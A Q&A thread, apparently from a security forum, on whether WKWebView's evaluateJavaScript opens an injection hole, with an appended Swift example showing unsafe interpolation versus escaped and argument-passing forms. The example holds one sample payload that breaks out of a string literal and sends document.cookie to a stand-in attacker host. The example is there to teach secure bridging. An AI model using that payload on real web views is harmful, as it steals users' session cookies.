2

I am using Webview on an application for some of the views we show. I have been tasked with finding a way to listen back to the native platform response, in this case, the iOS system.

My iOS developer shows me a POC using evaluateJavaScript (ref link).

func evaluateJavaScript(
    _ javaScriptString: String,
    completionHandler: ((Any?, Error?) -> Void)? = nil
)

In this method, by adding an id to a DOM element, we can inject the script back into the DOM and execute it.

When I hear "injection of script" I get a bit worried about the security. I tried to look around and didn't find something reassuring.

Who can advise? Is this safe? Can the action be hacked and used to inject malicious script back?

RoHaN
  • 372
  • 3
  • 14
user24136
  • 135
  • 4
  • 13

1 Answer

2

This is a pretty broad question, so you will probably only get opinionated answers, but I guess I will take a shot here.


In essence, the term "injection" here is surely technically correct, but has an unfortunate overlap with any injection that is part of the common attacks we see on websites of any kind.

I'd argue that in this case, however, the term describes functionality that is more like a browser plugin (or even the general behavior of a browser): Your app (which the WKWebView is a part of) acts as a browser and whatever script you then inject into any site is naturally part of that browser.

That's no different from a Chrome plug-in or even certain parts of the default behavior of some browsers that may modify a site's behavior by default.

Of course that means it is your job to ensure that the script you inject is properly sanitized. If, for example, you allow users in your app to enter arbitrary strings to be used in that script you open the door to badness.

Most use-cases that I'd see are probably safe (or can be done safely) in that they do not simply allow arbitrary script code (and strings are properly escaped).


I am not quite sure I understand the last part when you ask "Can the action be hacked and used to inject malicious script back?":

If you are worried that an attacker might hijack your app and use the evaluateJavaScript(_:completionHandler:) method to inject code into a website, you're basically saying that you are concerned about an attacker compromising your app. If there was a different exploit allowing someone to use your app to gain some kind of RCE privileges, we are talking about an entirely different problem. Simply having that functionality in your app on its own does not make that more or less likely, however.

As said, it all depends on what script you inject and what the website does (with or without it).


Side tangent:

In fact, if you tightly integrate some web content into an app and want the native code to interact with the website and vice versa, JavaScript injection is necessary and the designated way to do so. I'd probably go for the mechanics provided via the WKWebView's userContentController and WKUserScript objects and so forth. There you also find the "other way around", i.e. a mechanic to call code in your native app by invoking a JavaScript handler in the website.

Gero
  • 4,394
  • 20
  • 36
  • 1
    Gero, thank you for the details and well-described answer. My concern is indeed the attacker passing JavaScript code. You are right when you said it doesn't mean more or less, but it can be an entry point that I don't want to give away. Thanks – user24136 May 22 '23 at 11:58
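Added example, not part of the question, the answer or the comment above: a Swift sketch of the point the answer makes about escaping. It shows the unsafe string-interpolation form of evaluateJavaScript next to two safe forms (a JSON-encoded literal, and callAsyncJavaScript, which passes the value as a real argument), plus the reverse channel through WKUserContentController with the page's message treated as untrusted input. The element id "greeting", the handler name "native", the "action" field and the sample payload are all assumptions made for the illustration.

```swift
import WebKit

/// Added example (not from the original post). Assumes a page you control that
/// contains an element with id="greeting"; that id, the handler name "native"
/// and the message shape below are hypothetical.
final class NativeBridge: NSObject, WKScriptMessageHandler {
    let webView: WKWebView

    override init() {
        let config = WKWebViewConfiguration()
        webView = WKWebView(frame: .zero, configuration: config)
        super.init()
        // JS -> native: window.webkit.messageHandlers.native.postMessage({action: "ready"})
        // Note: every page loaded into this web view can see this handler, so also
        // restrict navigation (WKNavigationDelegate) to origins you trust.
        config.userContentController.add(self, name: "native")
    }

    // Constructed attacker-controlled value. Spliced raw into the script it closes
    // the string literal and runs its own code in the page.
    static let hostilePayload = "'; fetch('https://attacker.example/?c=' + document.cookie); //"

    // UNSAFE: the value becomes JavaScript *source*, not data. With hostilePayload
    // this runs the fetch() in the page's origin.
    func setGreetingUnsafe(_ text: String) {
        let js = "document.getElementById('greeting').textContent = '\(text)';"
        webView.evaluateJavaScript(js, completionHandler: nil)
    }

    // SAFE on every OS version: turn the value into a JSON literal, which is also a
    // valid JavaScript literal, so quotes, backslashes and control characters in the
    // value are escaped and it can only ever be a string in the page. Encoding a
    // one-element array avoids relying on top-level-fragment support in JSONEncoder;
    // the script reads element [0] back out.
    func setGreetingEscaped(_ text: String) throws {
        let literal = String(decoding: try JSONEncoder().encode([text]), as: UTF8.self)
        let js = "document.getElementById('greeting').textContent = \(literal)[0];"
        webView.evaluateJavaScript(js) { _, error in
            if let error = error { print("JS error:", error) }
        }
    }

    // PREFERRED (iOS 14 / macOS 11 and later): do not build source text at all.
    // Each entry in `arguments` is exposed to the function body as a variable of
    // that name, with the value marshalled as data, not parsed as code.
    @available(iOS 14.0, macOS 11.0, *)
    func setGreeting(_ text: String) {
        webView.callAsyncJavaScript(
            "document.getElementById('greeting').textContent = text;",
            arguments: ["text": text],
            in: nil,        // main frame
            in: .page       // the page's own JavaScript world
        ) { result in
            if case .failure(let error) = result { print("JS error:", error) }
        }
    }

    // Native side of the "other way around". The body is whatever the page sent,
    // so validate its type and shape and check which frame it came from before
    // acting on it; do not, for example, pass a string from here back into
    // setGreetingUnsafe or into a file path or URL without further checks.
    func userContentController(_ userContentController: WKUserContentController,
                               didReceive message: WKScriptMessage) {
        guard message.name == "native",
              message.frameInfo.isMainFrame,
              let body = message.body as? [String: Any],
              let action = body["action"] as? String else {
            return
        }
        switch action {
        case "ready":
            print("page reported ready from",
                  message.frameInfo.request.url?.host ?? "unknown host")
        default:
            print("ignoring unknown action:", action)
        }
    }
}
```

The two safe variants both encode the rule from the answer: the only strings that reach evaluateJavaScript as source are ones you wrote yourself; anything that originated from a user, a server response or the page itself travels as an escaped literal or as an argument. If you must support OS versions without callAsyncJavaScript, keep the JSON-literal path and never fall back to plain interpolation.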